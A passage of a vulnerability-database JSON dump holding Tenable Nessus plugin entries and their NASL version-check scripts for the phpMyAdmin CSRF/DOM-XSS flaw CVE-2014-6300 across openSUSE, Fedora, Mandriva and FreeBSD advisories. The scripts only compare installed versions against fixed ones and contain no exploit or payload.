script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI 
abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/PHP\", \"www/phpMyAdmin\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nappname = \"phpMyAdmin\";\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(appname:appname, port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nurl = build_url(qs:dir, port:port);\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, appname, url);\nif (version =~ \"^4(\\.[012])?$\") audit(AUDIT_VER_NOT_GRANULAR, appname, port, version);\nif (version !~ \"^4\\.[012][^0-9]\") audit(AUDIT_WEB_APP_NOT_INST, appname + \" 4.0.x / 4.1.x / 4.2.x\", port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nre = make_array(\n -2, \"-beta(\\d+)\",\n -1, \"-rc(\\d+)\"\n);\n\n# Affected version\n# 4.0.x < 4.0.10.3\n# 4.1.x < 4.1.14.4\n# 4.2.x < 4.2.8.1\ncut_off = NULL;\nfixed_ver = NULL;\n\nif (version =~ \"^4\\.0\\.\")\n{\n cut_off = '4.0.0';\n fixed_ver = '4.0.10.3';\n}\n\nif (version =~ \"^4\\.1\\.\")\n{\n cut_off = '4.1.0';\n fixed_ver = '4.1.14.4';\n}\n\nif (version =~ \"^4\\.2\\.\")\n{\n cut_off = '4.2.0';\n fixed_ver = '4.2.8.1';\n}\n\n# The following should never happen at this\n# point, but best to be safe and check anyway.\nif (isnull(cut_off) || isnull(fixed_ver))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);\n\nif (\n ver_compare(ver:version, fix:cut_off, regexes:re) >= 0 &&\n ver_compare(ver:version, fix:fixed_ver, regexes:re) == -1\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n set_kb_item(name:'www/' + port + '/XSRF', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n 
URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:27", "description": "Versions of phpMyAdmin earlier than 4.0.10.3, 4.1.14.4, or 4.2.8.1 are unpatched for a DOM-based cross-site scripting vulnerability in the micro-history feature that could be leveraged for cross-site request forgery -- that is, by deceiving a logged-in user to click on a crafted URL, an attacker could perform remote code execution and in some cases, create a root account, via the user's account.", "cvss3": {"score": 3.7, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2014-10-02T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.3, 4.1.x < 4.1.14.4, 4.2.x < 4.2.8.1 CSRF (PMASA-2014-10)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*"], "id": "8409.PRM", "href": "https://www.tenable.com/plugins/nnm/8409", "sourceData": "Binary data 8409.prm", "cvss": {"score": 4.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:42", "description": "phpMyAdmin was updated to 4.1.14.4 (2014-09-13) fixing bugs and security issues.\n\n - PMASA-2014-10 (CVE-2014-6300, CWE-661 CWE-352) http://www.phpmyadmin.net/home_page/security/PMASA-2014- 10.php\n\n A DOM based XSS was fixed that resulted to a CSRF that creates a ROOT account in certain conditions.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-23T00:00:00", "type": "nessus", "title": "openSUSE Security Update : phpMyAdmin (openSUSE-SU-2014:1150-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2021-01-19T00:00:00", 
"cpe": ["p-cpe:/a:novell:opensuse:phpMyAdmin", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-551.NASL", "href": "https://www.tenable.com/plugins/nessus/77804", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-551.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77804);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-6300\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (openSUSE-SU-2014:1150-1)\");\n script_summary(english:\"Check for the openSUSE-2014-551 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin was updated to 4.1.14.4 (2014-09-13) fixing bugs and\nsecurity issues.\n\n - PMASA-2014-10 (CVE-2014-6300, CWE-661 CWE-352)\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-\n 10.php\n\n A DOM based XSS was fixed that resulted to a CSRF that\n creates a ROOT account in certain conditions.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-10.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-10/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=896635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-09/msg00032.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"phpMyAdmin-4.1.14.4-1.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"phpMyAdmin-4.1.14.4-12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.3, 
"vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:39", "description": "phpMyAdmin 4.2.8.1 (2014-09-13) ===============================\n\n - [security] DOM based XSS that results to a CSRF that creates a ROOT account in certain conditions\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-23T00:00:00", "type": "nessus", "title": "Fedora 21 : phpMyAdmin-4.2.8.1-2.fc21 (2014-10885)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-10885.NASL", "href": "https://www.tenable.com/plugins/nessus/77797", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-10885.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77797);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_xref(name:\"FEDORA\", value:\"2014-10885\");\n\n script_name(english:\"Fedora 21 : phpMyAdmin-4.2.8.1-2.fc21 (2014-10885)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.8.1 (2014-09-13) ===============================\n\n - [security] DOM based XSS that results to a CSRF that\n creates a ROOT account in certain 
conditions\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141635\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138045.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7721746f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"phpMyAdmin-4.2.8.1-2.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:33", "description": "Updated phpmyadmin package fixes security vulnerability :\n\nIn phpMyAdmin before 4.2.9, by deceiving a logged-in user to click on a crafted URL, it is possible to perform remote code execution and in some cases, create a root account due to a DOM based XSS vulnerability in the micro history feature (CVE-2014-6300).", "cvss3": {"score": null, "vector": null}, "published": 
"2014-09-25T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:183)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:phpmyadmin", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-183.NASL", "href": "https://www.tenable.com/plugins/nessus/77840", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:183. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77840);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_xref(name:\"MDVSA\", value:\"2014:183\");\n\n script_name(english:\"Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:183)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated phpmyadmin package fixes security vulnerability :\n\nIn phpMyAdmin before 4.2.9, by deceiving a logged-in user to click on\na crafted URL, it is possible to perform remote code execution and in\nsome cases, create a root account due to a DOM based XSS vulnerability\nin the micro history feature (CVE-2014-6300).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0383.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpmyadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"phpmyadmin-4.2.9-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": 
"AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:37", "description": "phpMyAdmin 4.2.8.1 (2014-09-13) ===============================\n\n - [security] DOM based XSS that results to a CSRF that creates a ROOT account in certain conditions\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Fedora 19 : phpMyAdmin-4.2.8.1-2.fc19 (2014-10989)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-10989.NASL", "href": "https://www.tenable.com/plugins/nessus/77873", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-10989.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77873);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_xref(name:\"FEDORA\", value:\"2014-10989\");\n\n script_name(english:\"Fedora 19 : phpMyAdmin-4.2.8.1-2.fc19 (2014-10989)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.8.1 (2014-09-13) ===============================\n\n - [security] DOM based XSS that results to a CSRF that\n creates a ROOT account in certain 
conditions\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141635\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138640.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?170a450f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"phpMyAdmin-4.2.8.1-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:34", "description": "The phpMyAdmin development team reports :\n\nXSRF/CSRF due to DOM based XSS in the micro history feature.\n\nBy deceiving a logged-in user to click on a crafted URL, it is possible to perform remote code execution and in some cases, create a root account due to a DOM based XSS vulnerability in the micro history feature.", "cvss3": {"score": null, "vector": null}, 
"published": "2014-09-15T00:00:00", "type": "nessus", "title": "FreeBSD : phpMyAdmin -- XSRF/CSRF due to DOM based XSS in the micro history feature (cc627e6c-3b89-11e4-b629-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpMyAdmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_CC627E6C3B8911E4B6296805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/77679", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77679);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-6300\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- XSRF/CSRF due to DOM based XSS in the micro history feature (cc627e6c-3b89-11e4-b629-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nXSRF/CSRF due to DOM based XSS in the micro history feature.\n\nBy deceiving a logged-in user to click on a crafted URL, it is\npossible to perform remote code execution and in some cases, create a\nroot account due to a DOM based XSS vulnerability in the micro history\nfeature.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-10.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-10/\"\n );\n # https://vuxml.freebsd.org/freebsd/cc627e6c-3b89-11e4-b629-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?51bdfe94\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected 
package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin>=4.2.0<4.2.8.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": 